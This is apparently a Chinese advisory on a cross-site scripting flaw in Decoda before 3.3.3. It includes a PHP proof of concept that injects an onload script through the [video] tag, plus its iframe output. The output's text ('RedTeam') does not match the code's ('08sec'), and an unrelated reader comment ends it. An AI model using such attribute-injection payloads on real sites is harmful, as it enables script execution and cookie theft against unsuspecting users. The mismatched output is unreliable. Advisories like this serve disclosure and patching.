Decoda 3.3.3之前版本中存在跨站脚本漏洞，该漏洞源于对用户提供的输入未经正确过滤。

攻击者可利用该漏洞在受影响站点上下文的不知情用户浏览器上执行任意脚本代码，盗取基于cookie的认证证书进而发起其他攻击。

<?php
include '../decoda/Decoda.php';
$code = new Decoda();
$code->addFilter(new VideoFilter()); ?>
<?php

$decoda_markup = '[video="youtube" size="small"]"';
$decoda_markup .= 'onload="alert(\'08sec Pentesting XSS\');" id="[/video]';

$code->reset($decoda_markup);
echo $code->parse();
?>

This results in the following output (whitespace adjusted):

<iframe src="http://www.youtube.com/embed/"; onload="alert('RedTeam
Pentesting XSS');" id="" width="560" height="315"
frameborder="0"></iframe>

看你分享的东西很多，语言也涉及不少，但是是不是每个都能搞懂并且让猴子们吸收这才是关键